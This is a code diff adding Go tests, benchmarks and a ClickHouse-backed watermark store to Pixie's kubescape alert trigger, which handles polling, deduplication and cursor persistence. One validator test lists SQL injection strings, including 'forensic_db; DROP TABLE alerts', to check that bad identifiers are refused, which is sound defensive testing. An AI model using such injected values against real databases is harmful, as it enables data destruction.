+// SPDX-License-Identifier: Apache-2.0
+
+package trigger
+
+import (
+ "context"
+ "net/http"
+ "net/http/httptest"
+ "strings"
+ "sync/atomic"
+ "testing"
+ "time"
+)
+
+const canonicalRowJSON = `{"RuleID":"R1005","RuntimeK8sDetails":"{\"podName\":\"redis-578d5dc9bd-kjj78\",\"podNamespace\":\"redis\"}","RuntimeProcessDetails":"{\"processTree\":{\"pid\":106040,\"comm\":\"redis-server\"}}","event_time":"1744477360303026359","hostname":"node-1"}`
+
+// TestTrigger_Polls_HostnameAndWatermark — query carries
+// WHERE hostname=… AND event_time>=… . Race-free: the server pushes
+// each query string into a buffered channel; the test waits for the
+// SECOND request deterministically (no fixed sleep, no shared
+// non-atomic variable).
+func TestTrigger_Polls_HostnameAndWatermark(t *testing.T) {
+ queries := make(chan string, 8)
+ var calls int64
+ srv := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
+ n := atomic.AddInt64(&calls, 1)
+ queries <- r.URL.Query().Get("query")
+ if n == 1 {
+ _, _ = w.Write([]byte(canonicalRowJSON + "\n"))
+ return
+ }
+ _, _ = w.Write([]byte(""))
+ }))
+ defer srv.Close()
+ tr, err := New(Config{Endpoint: srv.URL, Hostname: "node-1", PollInterval: 30 * time.Millisecond})
+ if err != nil {
+ t.Fatalf("New: %v", err)
+ }
+ ctx, cancel := context.WithCancel(context.Background())
+ defer cancel()
+ ch, _ := tr.Subscribe(ctx)
+ select {
+ case ev := <-ch:
+ if ev.Target.Pod != "redis-578d5dc9bd-kjj78" {
+ t.Fatalf("Pod = %q", ev.Target.Pod)
+ }
+ if ev.Target.PID != 106040 {
+ t.Fatalf("PID = %d", ev.Target.PID)
+ }
+ if ev.Hostname != "node-1" {
+ t.Fatalf("Hostname = %q", ev.Hostname)
+ }
+ case <-time.After(500 * time.Millisecond):
+ t.Fatalf("timeout waiting for first event")
+ }
+ // Drain the first query, then wait for the second (advanced
+ // watermark) — channel-based, so no fixed sleep races.
+ <-queries
+ var lastQuery string
+ select {
+ case lastQuery = <-queries:
+ case <-time.After(500 * time.Millisecond):
+ t.Fatalf("timeout waiting for second poll")
+ }
+ if !strings.Contains(lastQuery, "hostname = 'node-1'") {
+ t.Fatalf("query missing hostname filter: %q", lastQuery)
+ }
+ // post-#10/trigger-unit-normalize: SQL wraps event_time in multiIf(...);
+ // 1.744e18 is already ns-scale so it passes through unchanged.
+ if !strings.Contains(lastQuery, ") >= 1744477360303026359") {
+ t.Fatalf("watermark didn't advance to inclusive boundary: %q", lastQuery)
+ }
+}
+
+// TestTrigger_RequiresHostname — defensive: refuses empty hostname.
+func TestTrigger_RequiresHostname(t *testing.T) {
+ if _, err := New(Config{Endpoint: "http://x", Hostname: ""}); err == nil {
+ t.Fatalf("empty Hostname not rejected")
+ }
+}
+
+// TestTrigger_ContextCancellationClosesChannel — clean shutdown.
+func TestTrigger_ContextCancellationClosesChannel(t *testing.T) {
+ srv := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {}))
+ defer srv.Close()
+ tr, _ := New(Config{Endpoint: srv.URL, Hostname: "node-1", PollInterval: 30 * time.Millisecond})
+ ctx, cancel := context.WithCancel(context.Background())
+ ch, _ := tr.Subscribe(ctx)
+ cancel()
+ select {
+ case _, ok := <-ch:
+ if ok {
+ t.Fatalf("channel produced after cancel")
+ }
+ case <-time.After(300 * time.Millisecond):
+ t.Fatalf("channel not closed within 300ms of cancel")
+ }
+}
+
+// TestTrigger_HTTPErrorContinues — transient 5xx → retry, system stable.
+func TestTrigger_HTTPErrorContinues(t *testing.T) {
+ var calls int64
+ srv := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
+ n := atomic.AddInt64(&calls, 1)
+ if n == 1 {
+ w.WriteHeader(503)
+ return
+ }
+ _, _ = w.Write([]byte(canonicalRowJSON + "\n"))
+ }))
+ defer srv.Close()
+ tr, _ := New(Config{Endpoint: srv.URL, Hostname: "node-1", PollInterval: 30 * time.Millisecond})
+ ctx, cancel := context.WithCancel(context.Background())
+ defer cancel()
+ ch, _ := tr.Subscribe(ctx)
+ select {
+ case ev := <-ch:
+ if ev.Target.Comm == "" {
+ t.Fatalf("got empty Target after recovery")
+ }
+ case <-time.After(500 * time.Millisecond):
+ t.Fatalf("trigger did not recover from transient HTTP 503")
+ }
+}
+
+// TestTrigger_DedupesAtWatermarkBoundary — same-event_time rows that
+// arrive in a later poll than they were already observed must NOT be
+// re-emitted. Distinct rows at the same boundary timestamp must still
+// be emitted (only the duplicate is suppressed).
+func TestTrigger_DedupesAtWatermarkBoundary(t *testing.T) {
+ const distinctRowJSON = `{"RuleID":"R0006","RuntimeK8sDetails":"{\"podName\":\"redis-578d5dc9bd-kjj78\",\"podNamespace\":\"redis\"}","RuntimeProcessDetails":"{\"processTree\":{\"pid\":222222,\"comm\":\"redis-cli\"}}","event_time":"1744477360303026359","hostname":"node-1"}`
+ var calls int64
+ srv := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
+ n := atomic.AddInt64(&calls, 1)
+ switch n {
+ case 1:
+ // First poll emits the canonical row.
+ _, _ = w.Write([]byte(canonicalRowJSON + "\n"))
+ case 2:
+ // Second poll: server "re-discovers" the SAME row at the
+ // boundary timestamp PLUS one DISTINCT row at the same
+ // event_time. The trigger must suppress the duplicate
+ // fingerprint and pass through the distinct one.
+ _, _ = w.Write([]byte(canonicalRowJSON + "\n" + distinctRowJSON + "\n"))
+ default:
+ _, _ = w.Write([]byte(""))
+ }
+ }))
+ defer srv.Close()
+
+ tr, _ := New(Config{Endpoint: srv.URL, Hostname: "node-1", PollInterval: 30 * time.Millisecond})
+ ctx, cancel := context.WithCancel(context.Background())
+ defer cancel()
+ ch, _ := tr.Subscribe(ctx)
+
+ // Collect events for ~250 ms — long enough for at least 3 polls.
+ deadline := time.Now().Add(250 * time.Millisecond)
+ var got []uint64 // PIDs we observed
+ for time.Now().Before(deadline) {
+ select {
+ case ev := <-ch:
+ got = append(got, ev.Target.PID)
+ case <-time.After(20 * time.Millisecond):
+ }
+ }
+ // Expect exactly 2 events: PID 106040 (canonical, emitted once
+ // even though server returned it twice) and PID 222222 (distinct
+ // row at same boundary, emitted exactly once).
+ if len(got) != 2 {
+ t.Fatalf("got %d events, want 2 (canonical + distinct, no dup); pids=%v", len(got), got)
+ }
+ canonicalSeen, distinctSeen := 0, 0
+ for _, pid := range got {
+ switch pid {
+ case 106040:
+ canonicalSeen++
+ case 222222:
+ distinctSeen++
+ }
+ }
+ if canonicalSeen != 1 {
+ t.Fatalf("canonical row emitted %d times, want 1 (dedup failed)", canonicalSeen)
+ }
+ if distinctSeen != 1 {
+ t.Fatalf("distinct same-event_time row emitted %d times, want 1 (over-aggressive dedup)", distinctSeen)
+ }
+}
+
+// TestTrigger_RejectsInvalidIdentifiers — defensive: SQL injection via
+// Database/Table config is refused at construction time.
+func TestTrigger_RejectsInvalidIdentifiers(t *testing.T) {
+ for _, bad := range []string{
+ "forensic_db; DROP TABLE alerts",
+ "db with space",
+ "123starts_with_digit",
+ "backtick`injection",
+ "forensic_db.kubescape_logs", // dotted not allowed for this table param
+ } {
+ _, err := New(Config{Endpoint: "http://x", Hostname: "node-1", Database: bad})
+ if err == nil {
+ t.Errorf("New accepted bad Database %q; expected error", bad)
+ }
+ _, err = New(Config{Endpoint: "http://x", Hostname: "node-1", Table: bad})
+ if err == nil {
+ t.Errorf("New accepted bad Table %q; expected error", bad)
+ }
+ }
+}
+
+// TestTrigger_BadRowSkipped — incomplete kubescape row is skipped, good rows still arrive.
+func TestTrigger_BadRowSkipped(t *testing.T) {
+ bad := `{"RuleID":"","RuntimeK8sDetails":"","RuntimeProcessDetails":"","event_time":"1","hostname":"node-1"}` + "\n"
+ srv := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
+ _, _ = w.Write([]byte(bad + canonicalRowJSON + "\n"))
+ }))
+ defer srv.Close()
+ tr, _ := New(Config{Endpoint: srv.URL, Hostname: "node-1", PollInterval: 30 * time.Millisecond})
+ ctx, cancel := context.WithCancel(context.Background())
+ defer cancel()
+ ch, _ := tr.Subscribe(ctx)
+ select {
+ case ev := <-ch:
+ if ev.Target.Comm != "redis-server" {
+ t.Fatalf("got Comm %q; bad row leaked through", ev.Target.Comm)
+ }
+ case <-time.After(500 * time.Millisecond):
+ t.Fatalf("good row not received after bad-row skip")
+ }
+}
diff --git a/src/vizier/services/adaptive_export/internal/trigger/fingerprint_bench_test.go b/src/vizier/services/adaptive_export/internal/trigger/fingerprint_bench_test.go
new file mode 100644
index 00000000000..2924b2b4df7
--- /dev/null
+++ b/src/vizier/services/adaptive_export/internal/trigger/fingerprint_bench_test.go
@@ -0,0 +1,142 @@
+// Copyright 2018- The Pixie Authors.
+//
+// Licensed under the Apache License, Version 2.0 (the "License");
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+// http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+//
+// SPDX-License-Identifier: Apache-2.0
+
+package trigger
+
+import (
+ "crypto/sha256"
+ "encoding/hex"
+ "fmt"
+ "strings"
+ "testing"
+
+ "px.dev/pixie/src/vizier/services/adaptive_export/internal/kubescape"
+)
+
+// rowFingerprint is the deduper for boundary rows at each poll. It
+// runs ONCE PER kubescape row pulled from ClickHouse by the trigger
+// (clickhouse.go:272-273). With PollLimit=10000 and a 250ms ticker, a
+// trigger that's catching up from a stale watermark can process 40k
+// rows/sec PURELY in the fingerprint loop — every one of which:
+//
+// 1. Allocates a fresh sha256 hasher (sha256.New).
+// 2. Runs fmt.Fprintf with %d/%s verbs into the hasher (uses reflect).
+// 3. Hex-encodes the 32-byte digest into a 64-char string.
+//
+// The bench numbers below quantify that. If the per-row cost is
+// significant, the trigger backlog drain itself is a CPU consumer
+// independent of any downstream work.
+
+func benchKubescapeRow(i int) kubescape.Row {
+ // K8sDetails / ProcessDetails are JSON blobs in production —
+ // kubescape emits them at ~500 bytes typical, ~2KB upper.
+ const k8sDetails = `{"podNamespace":"log4j-poc","podName":"backend-vulnerable-779cd9d765-mxr8t","containerName":"backend","workloadName":"backend-vulnerable","workloadKind":"Deployment","image":"ghcr.io/k8sstormcenter/log4j-chain-backend-vulnerable:latest","clusterName":"soc-demo-pg","nodeName":"node-1"}`
+ const procDetails = `{"comm":"java","pid":1234,"ppid":1,"path":"/usr/lib/jvm/java-11/bin/java","argv":["java","-cp","/app/log4j-vuln-1.0.jar","com.example.App"],"user":"appuser","cwd":"/app","spawn_time":"2026-06-07T18:00:00Z"}`
+ return kubescape.Row{
+ EventTime: uint64(1_700_000_000_000_000_000 + i),
+ RuleID: "R1100",
+ Hostname: "pixie-worker-node",
+ K8sDetails: k8sDetails,
+ ProcessDetails: procDetails,
+ }
+}
+
+func BenchmarkRowFingerprint(b *testing.B) {
+ row := benchKubescapeRow(0)
+ b.ReportAllocs()
+ b.ResetTimer()
+ for i := 0; i < b.N; i++ {
+ _ = rowFingerprint(row)
+ }
+}
+
+// BenchmarkRowFingerprint_Unique varies event_time per call so the
+// hasher gets unique input bytes (matches real boundary-row behaviour
+// where each row has its own event_time).
+func BenchmarkRowFingerprint_Unique(b *testing.B) {
+ rows := make([]kubescape.Row, 1024)
+ for i := range rows {
+ rows[i] = benchKubescapeRow(i)
+ }
+ b.ReportAllocs()
+ b.ResetTimer()
+ for i := 0; i < b.N; i++ {
+ _ = rowFingerprint(rows[i%len(rows)])
+ }
+}
+
+// BenchmarkRowFingerprint_LargePoll simulates one trigger poll
+// draining PollLimit=10000 rows — the boundary-dedup pass after a
+// stale-watermark catchup. The trigger does this ONCE per
+// PollInterval (250ms default) when there's a backlog; under a
+// 100ms-jitter ticker drift this can run 4-10× per second.
+func BenchmarkRowFingerprint_LargePoll(b *testing.B) {
+ const batch = 10_000
+ rows := make([]kubescape.Row, batch)
+ for i := range rows {
+ rows[i] = benchKubescapeRow(i)
+ }
+ b.ReportAllocs()
+ b.ResetTimer()
+ for n := 0; n < b.N; n++ {
+ for i := range rows {
+ _ = rowFingerprint(rows[i])
+ }
+ }
+}
+
+// BenchmarkRowFingerprintSimple_LargePoll uses an alternative
+// allocation-free fingerprint (sha256-of-concatenated-strings via a
+// builder + direct Write). Lets us compare the current Fprintf-based
+// implementation's reflect-driven cost against a hand-rolled version
+// — informs whether replacing the fmt.Fprintf is a worthwhile
+// micro-optimisation if the standard bench shows the trigger
+// fingerprint as a CPU hotspot.
+func BenchmarkRowFingerprintSimple_LargePoll(b *testing.B) {
+ const batch = 10_000
+ rows := make([]kubescape.Row, batch)
+ for i := range rows {
+ rows[i] = benchKubescapeRow(i)
+ }
+ b.ReportAllocs()
+ b.ResetTimer()
+ for n := 0; n < b.N; n++ {
+ for i := range rows {
+ _ = fingerprintNoFmt(rows[i])
+ }
+ }
+}
+
+// fingerprintNoFmt is the Fprintf-free reference. Same output guarantee
+// is NOT asserted here — this is a perf-comparison anchor only. If the
+// numbers diverge by >2× from rowFingerprint, the fmt.Fprintf path is
+// a real cost.
+func fingerprintNoFmt(r kubescape.Row) string {
+ h := sha256.New()
+ var b strings.Builder
+ b.Grow(64 + len(r.RuleID) + len(r.Hostname) + len(r.K8sDetails) + len(r.ProcessDetails))
+ _, _ = fmt.Fprintf(&b, "%d", r.EventTime)
+ b.WriteByte(0)
+ b.WriteString(r.RuleID)
+ b.WriteByte(0)
+ b.WriteString(r.Hostname)
+ b.WriteByte(0)
+ b.WriteString(r.K8sDetails)
+ b.WriteByte(0)
+ b.WriteString(r.ProcessDetails)
+ h.Write([]byte(b.String()))
+ return hex.EncodeToString(h.Sum(nil))
+}
diff --git a/src/vizier/services/adaptive_export/internal/trigger/integration_test.go b/src/vizier/services/adaptive_export/internal/trigger/integration_test.go
new file mode 100644
index 00000000000..c8a42f73575
--- /dev/null
+++ b/src/vizier/services/adaptive_export/internal/trigger/integration_test.go
@@ -0,0 +1,149 @@
+// Copyright 2018- The Pixie Authors.
+//
+// Licensed under the Apache License, Version 2.0 (the "License");
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+// http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+//
+// SPDX-License-Identifier: Apache-2.0
+
+//go:build integration
+// +build integration
+
+package trigger_test
+
+import (
+ "context"
+ "fmt"
+ "io"
+ "net/http"
+ "net/url"
+ "os"
+ "strings"
+ "testing"
+ "time"
+
+ chpkg "px.dev/pixie/src/vizier/services/adaptive_export/internal/clickhouse"
+ "px.dev/pixie/src/vizier/services/adaptive_export/internal/trigger"
+)
+
+// Live integration test for the trigger's poll loop. Inserts a
+// kubescape_logs row directly via HTTP, then asserts the trigger
+// surfaces it as a kubescape.Event before the deadline.
+
+func env(t *testing.T) (endpoint, user, pass string) {
+ t.Helper()
+ endpoint = os.Getenv("INTEGRATION_CH_ENDPOINT")
+ if endpoint == "" {
+ t.Skip("INTEGRATION_CH_ENDPOINT not set; skipping live ClickHouse test")
+ }
+ return endpoint, os.Getenv("INTEGRATION_CH_USER"), os.Getenv("INTEGRATION_CH_PASSWORD")
+}
+
+func ensureSchema(t *testing.T, endpoint, user, pass string) {
+ t.Helper()
+ a, err := chpkg.NewApplier(endpoint, user, pass)
+ if err != nil {
+ t.Fatalf("NewApplier: %v", err)
+ }
+ ctx, cancel := context.WithTimeout(context.Background(), 60*time.Second)
+ defer cancel()
+ if err := a.Apply(ctx); err != nil {
+ t.Fatalf("Apply (precondition): %v", err)
+ }
+}
+
+// insertKubescapeRow shoves one synthetic row into kubescape_logs via
+// JSONEachRow on the HTTP interface — same shape Vector emits.
+func insertKubescapeRow(t *testing.T, endpoint, user, pass, hostname, ruleID string, eventTime uint64) {
+ t.Helper()
+ body := fmt.Sprintf(
+ `{"BaseRuntimeMetadata":"{\"alertName\":\"%s\"}","CloudMetadata":"","RuleID":"%s","RuntimeK8sDetails":"{\"podName\":\"redis-test\",\"podNamespace\":\"redis\"}","RuntimeProcessDetails":"{\"processTree\":{\"pid\":1234,\"comm\":\"redis-server\"}}","event":"","event_time":%d,"hostname":"%s"}`,
+ ruleID, ruleID, eventTime, hostname,
+ )
+ q := url.Values{}
+ q.Set("query", "INSERT INTO forensic_db.kubescape_logs FORMAT JSONEachRow")
+ req, err := http.NewRequest(http.MethodPost,
+ strings.TrimRight(endpoint, "/")+"/?"+q.Encode(),
+ strings.NewReader(body))
+ if err != nil {
+ t.Fatal(err)
+ }
+ req.Header.Set("Content-Type", "application/x-ndjson")
+ if user != "" {
+ req.SetBasicAuth(user, pass)
+ }
+ resp, err := (&http.Client{Timeout: 10 * time.Second}).Do(req)
+ if err != nil {
+ t.Fatalf("seed insert: %v", err)
+ }
+ defer resp.Body.Close()
+ if resp.StatusCode/100 != 2 {
+ buf, _ := io.ReadAll(io.LimitReader(resp.Body, 4096))
+ t.Fatalf("seed insert HTTP %d: %s", resp.StatusCode, strings.TrimSpace(string(buf)))
+ }
+}
+
+// TestTriggerSubscribe_Live: insert one row, expect one Event from the
+// trigger's Subscribe channel within the deadline.
+func TestTriggerSubscribe_Live(t *testing.T) {
+ endpoint, user, pass := env(t)
+ ensureSchema(t, endpoint, user, pass)
+
+ hostname := fmt.Sprintf("aw-trig-%d", time.Now().UnixNano())
+ now := time.Now()
+ eventTime := uint64(now.UnixNano())
+
+ // Use a watermark slightly before the synthetic event_time so the
+ // first poll picks up exactly our row, regardless of unrelated rows
+ // in the table from earlier runs.
+ cfg := trigger.Config{
+ Endpoint: endpoint,
+ Username: user,
+ Password: pass,
+ Hostname: hostname,
+ PollInterval: 200 * time.Millisecond,
+ InitialWatermark: eventTime - 1,
+ }
+ trg, err := trigger.New(cfg)
+ if err != nil {
+ t.Fatalf("trigger.New: %v", err)
+ }
+
+ ctx, cancel := context.WithTimeout(context.Background(), 15*time.Second)
+ defer cancel()
+ ch, err := trg.Subscribe(ctx)
+ if err != nil {
+ t.Fatalf("Subscribe: %v", err)
+ }
+
+ insertKubescapeRow(t, endpoint, user, pass, hostname, "R1005", eventTime)
+
+ select {
+ case ev, ok := <-ch:
+ if !ok {
+ t.Fatalf("channel closed before event arrived")
+ }
+ if ev.RuleID != "R1005" {
+ t.Errorf("Event.RuleID = %q, want R1005", ev.RuleID)
+ }
+ if ev.Hostname != hostname {
+ t.Errorf("Event.Hostname = %q, want %q", ev.Hostname, hostname)
+ }
+ if ev.EventTime != eventTime {
+ t.Errorf("Event.EventTime = %d, want %d", ev.EventTime, eventTime)
+ }
+ if ev.Target.Pod != "redis-test" || ev.Target.Namespace != "redis" {
+ t.Errorf("Event.Target = %+v, want pod=redis-test, ns=redis", ev.Target)
+ }
+ case <-ctx.Done():
+ t.Fatalf("trigger did not surface the seeded row within 15s")
+ }
+}
diff --git a/src/vizier/services/adaptive_export/internal/trigger/watermark.go b/src/vizier/services/adaptive_export/internal/trigger/watermark.go
new file mode 100644
index 00000000000..6d6d98daa87
--- /dev/null
+++ b/src/vizier/services/adaptive_export/internal/trigger/watermark.go
@@ -0,0 +1,127 @@
+// Copyright 2018- The Pixie Authors.
+//
+// Licensed under the Apache License, Version 2.0 (the "License");
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+// http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+//
+// SPDX-License-Identifier: Apache-2.0
+
+package trigger
+
+import (
+ "bytes"
+ "context"
+ "encoding/json"
+ "fmt"
+ "time"
+
+ "px.dev/pixie/src/vizier/services/adaptive_export/internal/chhttp"
+)
+
+// WatermarkStore persists the trigger's per-(hostname,table) cursor
+// across operator restarts. Without persistence, every restart on a
+// busy node replays kubescape_logs from event_time=0 — multi-GiB
+// single-shot SELECTs that the trigger's HTTP client times out on,
+// pinning the watermark at 0 forever.
+//
+// Load returns (watermark, true, nil) when a row exists, or
+// (0, false, nil) when no row exists yet (fresh cluster). An error
+// returned from Load or Save is logged + non-fatal: the trigger falls
+// back to whatever cold-start strategy the caller chose.
+type WatermarkStore interface {
+ Load(ctx context.Context, hostname, table string) (uint64, bool, error)
+ Save(ctx context.Context, hostname, table string, watermark uint64) error
+}
+
+// ClickHouseWatermarkStore is the production WatermarkStore — reads
+// and writes forensic_db.trigger_watermark over the same HTTP endpoint
+// as the rest of the operator. Schema is owned by the clickhouse
+// package's Apply (CREATE TABLE IF NOT EXISTS at boot).
+type ClickHouseWatermarkStore struct {
+ database string
+ c *chhttp.Client
+}
+
+// NewClickHouseWatermarkStore validates the endpoint and returns a
+// ready store. timeout=0 → chhttp default (watermark IO is tiny, but
+// we share the operator's overall conservative network-call budget).
+func NewClickHouseWatermarkStore(endpoint, database, user, pass string, timeout time.Duration) (*ClickHouseWatermarkStore, error) {
+ if database == "" {
+ database = "forensic_db"
+ }
+ if !validIdentifier(database) {
+ return nil, fmt.Errorf("watermark: invalid database identifier %q", database)
+ }
+ c, err := chhttp.New(endpoint, user, pass, timeout)
+ if err != nil {
+ return nil, fmt.Errorf("watermark: %w", err)
+ }
+ return &ClickHouseWatermarkStore{database: database, c: c}, nil
+}
+
+// Load returns the most-recent persisted watermark for (hostname, table).
+// Uses FINAL — the table is ReplacingMergeTree, and per-(hostname,table)
+// cardinality is one, so the cost is negligible. (false, nil, nil) means
+// no row exists for the key yet — the trigger's caller chooses cold-start.
+func (s *ClickHouseWatermarkStore) Load(ctx context.Context, hostname, table string) (uint64, bool, error) {
+ body, err := s.c.Query(ctx, fmt.Sprintf(
+ "SELECT watermark FROM %s.trigger_watermark FINAL "+
+ "WHERE hostname = %s AND table_name = %s LIMIT 1 FORMAT JSONEachRow",
+ s.database, quoteCH(hostname), quoteCH(table)))
+ if err != nil {
+ return 0, false, fmt.Errorf("watermark load: %w", err)
+ }
+ body = bytes.TrimSpace(body)
+ if len(body) == 0 {
+ return 0, false, nil
+ }
+ // JSONEachRow returns watermark as a JSON number; UInt64 values
+ // above 2^53 lose precision through float64, so we accept either
+ // number or string and parse strictly as uint64.
+ var raw struct {
+ Watermark json.RawMessage `json:"watermark"`
+ }
+ if err := json.Unmarshal(bytes.Split(body, []byte{'\n'})[0], &raw); err != nil {
+ return 0, false, fmt.Errorf("watermark load: parse response: %w", err)
+ }
+ wm, err := parseUint64Loose(raw.Watermark)
+ if err != nil {
+ return 0, false, fmt.Errorf("watermark load: %w", err)
+ }
+ return wm, true, nil
+}
+
+// Save inserts a new row. ReplacingMergeTree(updated_at) merges later;
+// reads via FINAL always return the freshest. Write is fire-and-merge
+// — no UPDATE semantics, no contention with concurrent INSERTs from
+// other operator instances (each pins its own hostname).
+func (s *ClickHouseWatermarkStore) Save(ctx context.Context, hostname, table string, watermark uint64) error {
+ row, err := json.Marshal(struct {
+ Hostname string `json:"hostname"`
+ TableName string `json:"table_name"`
+ Watermark uint64 `json:"watermark"`
+ UpdatedAt string `json:"updated_at"`
+ }{
+ Hostname: hostname,
+ TableName: table,
+ Watermark: watermark,
+ UpdatedAt: time.Now().UTC().Format("2006-01-02 15:04:05.000000000"),
+ })
+ if err != nil {
+ return err
+ }
+ if _, err := s.c.Insert(ctx,
+ fmt.Sprintf("INSERT INTO %s.trigger_watermark FORMAT JSONEachRow", s.database),
+ row, chhttp.InsertOptions{}); err != nil {
+ return fmt.Errorf("watermark save: %w", err)
+ }
+ return nil
+}
diff --git a/src/vizier/services/adaptive_export/internal/trigger/watermark_test.go b/src/vizier/services/adaptive_export/internal/trigger/watermark_test.go
new file mode 100644
index 00000000000..d0cf8aa818a
--- /dev/null
+++ b/src/vizier/services/adaptive_export/internal/trigger/watermark_test.go
@@ -0,0 +1,313 @@
+// Copyright 2018- The Pixie Authors.
+//
+// Licensed under the Apache License, Version 2.0 (the "License");
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+// http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+//
+// SPDX-License-Identifier: Apache-2.0
+
+package trigger
+
+import (
+ "context"
+ "fmt"
+ "io"
+ "net/http"
+ "net/http/httptest"
+ "strings"
+ "sync"
+ "sync/atomic"
+ "testing"
+ "time"
+)
+
+// fakeStore is an in-memory WatermarkStore for testing trigger
+// integration without needing a live ClickHouse.
+type fakeStore struct {
+ mu sync.Mutex
+ saves []uint64
+ loadResult uint64
+ loadOK bool
+ loadErr error
+ saveErr error
+}
+
+func (f *fakeStore) Load(ctx context.Context, hostname, table string) (uint64, bool, error) {
+ f.mu.Lock()
+ defer f.mu.Unlock()
+ return f.loadResult, f.loadOK, f.loadErr
+}
+
+func (f *fakeStore) Save(ctx context.Context, hostname, table string, wm uint64) error {
+ f.mu.Lock()
+ defer f.mu.Unlock()
+ if f.saveErr != nil {
+ return f.saveErr
+ }
+ f.saves = append(f.saves, wm)
+ return nil
+}
+
+func (f *fakeStore) savedCount() int {
+ f.mu.Lock()
+ defer f.mu.Unlock()
+ return len(f.saves)
+}
+
+// TestTrigger_LoadsPersistentWatermarkOnBoot — the very first SELECT
+// the trigger issues must filter event_time by the persisted watermark,
+// not by InitialWatermark or 0.
+func TestTrigger_LoadsPersistentWatermarkOnBoot(t *testing.T) {
+ queries := make(chan string, 256)
+ srv := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
+ queries <- r.URL.Query().Get("query")
+ _, _ = w.Write([]byte(""))
+ }))
+ defer srv.Close()
+
+ store := &fakeStore{loadResult: 1744000000000000000, loadOK: true}
+ tr, err := New(Config{
+ Endpoint: srv.URL,
+ Hostname: "node-1",
+ PollInterval: 30 * time.Millisecond,
+ Watermark: store,
+ // InitialWatermark deliberately set to a SMALLER value than
+ // the store's — the store's value must win.
+ InitialWatermark: 0,
+ })
+ if err != nil {
+ t.Fatalf("New: %v", err)
+ }
+ ctx, cancel := context.WithCancel(context.Background())
+ defer cancel()
+ _, _ = tr.Subscribe(ctx)
+ select {
+ case q := <-queries:
+ // post-#10/trigger-unit-normalize: SQL emits multiIf(...) >=
+ // (event_time is auto-normalized to nanoseconds). 1.744e18 is already
+ // ns-scale so it passes through the multiIf unchanged.
+ if !strings.Contains(q, ") >= 1744000000000000000") {
+ t.Fatalf("first query did not use persisted watermark; got %q", q)
+ }
+ case <-time.After(500 * time.Millisecond):
+ t.Fatalf("timeout waiting for first poll")
+ }
+}
+
+// TestTrigger_FallsBackToInitialWatermarkWhenStoreEmpty — fresh cluster:
+// the persistent table has no row for this host yet, trigger uses
+// the configured InitialWatermark instead.
+func TestTrigger_FallsBackToInitialWatermarkWhenStoreEmpty(t *testing.T) {
+ queries := make(chan string, 256)
+ srv := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
+ queries <- r.URL.Query().Get("query")
+ _, _ = w.Write([]byte(""))
+ }))
+ defer srv.Close()
+
+ store := &fakeStore{loadOK: false} // no row present
+ tr, _ := New(Config{
+ Endpoint: srv.URL, Hostname: "node-1",
+ PollInterval: 30 * time.Millisecond,
+ Watermark: store,
+ InitialWatermark: 42,
+ })
+ ctx, cancel := context.WithCancel(context.Background())
+ defer cancel()
+ _, _ = tr.Subscribe(ctx)
+ select {
+ case q := <-queries:
+ // post-#10/trigger-unit-normalize: InitialWatermark=42 is <1e10 so the
+ // multiIf treats it as seconds and multiplies by 1e9 → 42_000_000_000.
+ if !strings.Contains(q, ") >= 42000000000") {
+ t.Fatalf("first query did not use InitialWatermark fallback; got %q", q)
+ }
+ case <-time.After(500 * time.Millisecond):
+ t.Fatalf("timeout waiting for first poll")
+ }
+}
+
+// TestTrigger_FallsBackOnStoreLoadError — store unreachable on boot
+// must not block the trigger from starting; it falls back to
+// InitialWatermark and continues.
+func TestTrigger_FallsBackOnStoreLoadError(t *testing.T) {
+ queries := make(chan string, 256)
+ srv := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
+ queries <- r.URL.Query().Get("query")
+ _, _ = w.Write([]byte(""))
+ }))
+ defer srv.Close()
+
+ store := &fakeStore{loadErr: fmt.Errorf("clickhouse unreachable")}
+ tr, _ := New(Config{
+ Endpoint: srv.URL, Hostname: "node-1",
+ PollInterval: 30 * time.Millisecond,
+ Watermark: store,
+ InitialWatermark: 7,
+ })
+ ctx, cancel := context.WithCancel(context.Background())
+ defer cancel()
+ _, _ = tr.Subscribe(ctx)
+ select {
+ case q := <-queries:
+ // post-#10/trigger-unit-normalize: InitialWatermark=7 is <1e10 so the
+ // multiIf treats it as seconds and multiplies by 1e9 → 7_000_000_000.
+ if !strings.Contains(q, ") >= 7000000000") {
+ t.Fatalf("error path did not fall back to InitialWatermark; got %q", q)
+ }
+ case <-time.After(500 * time.Millisecond):
+ t.Fatalf("timeout waiting for first poll")
+ }
+}
+
+// TestTrigger_ThrottledWatermarkSave — successful advances are
+// flushed at WatermarkSaveInterval cadence, not on every poll. The
+// fake store should see far fewer saves than there were polls.
+func TestTrigger_ThrottledWatermarkSave(t *testing.T) {
